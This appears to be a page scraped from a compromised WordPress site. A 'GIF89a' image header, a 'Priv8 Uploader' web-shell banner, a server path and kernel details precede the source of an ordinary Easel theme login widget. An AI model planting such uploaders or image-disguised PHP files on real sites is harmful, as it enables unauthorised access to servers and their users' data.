GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/*
Widget Name: Control Panel
Description: Display an area for login and logout, forgot password and register.
Author: Philip M. Hofer (Frumph)
Author URI: http://frumph.net/
Version: 1.04
*/
class easel_control_panel_widget extends WP_Widget {
function easel_control_panel_widget($skip_widget_init = false) {
if (!$skip_widget_init) {
$widget_ops = array('classname' => __CLASS__, 'description' => __('Login/Logoff menu with register/lost password links if not logged on. (use only if registrations are enabled.','easel') );
$this->WP_Widget(__CLASS__, __('Control Panel','easel'), $widget_ops);
}
}
function easel_show_control_panel() {
global $user_login;
if (!is_user_logged_in()) { ?>
<?php
$args = array(
'label_username' => __('Username', 'easel'),
'label_password' => __('Password', 'easel')
);
wp_login_form($args);
?>
<ul>
<?php if (is_multisite()) { ?>
<li><a href="<?php echo site_url(); ?>/wp-signup.php"><?php _e('Register','easel'); ?></a></li>
<?php } else { ?>
<li><a href="<?php echo site_url(); ?>/wp-register.php"><?php _e('Register','easel'); ?></a></li>
<?php } ?>
<li><a href="<?php echo site_url(); ?>/wp-login.php?action=lostpassword"><?php _e('Recover password','easel'); ?></a></li>
</ul>
<?php } else { ?>
<ul>
<li><a href="<?php echo wp_logout_url(get_permalink()); ?>"><?php _e('Logout','easel'); ?></a></li>
<?php wp_register(); ?>
<li><a href="<?php echo site_url(); ?>/wp-admin/profile.php"><?php _e('Profile','easel'); ?></a></li>
</ul>
<?php } ?>
<?php
}
function widget($args, $instance) {
extract($args, EXTR_SKIP);
Protect();
echo $before_widget;
$title = empty($instance['title']) ? __('Control Panel','easel') : apply_filters('widget_title', $instance['title']);
if ( !empty( $title ) ) { echo $before_title . $title . $after_title; };
$this->easel_show_control_panel();
echo $after_widget;
UnProtect();
}
function update($new_instance, $old_instance) {
$instance = $old_instance;
$instance['title'] = strip_tags($new_instance['title']);
return $instance;
}
function form($instance) {
$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
$title = strip_tags($instance['title']);
?>
<p><label for="<?php echo $this->get_field_id('title'); ?>"><?php _e('Title:','easel'); ?> <input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo esc_attr($title); ?>" /></label></p>
<?php
}
}
register_widget('easel_control_panel_widget');
?>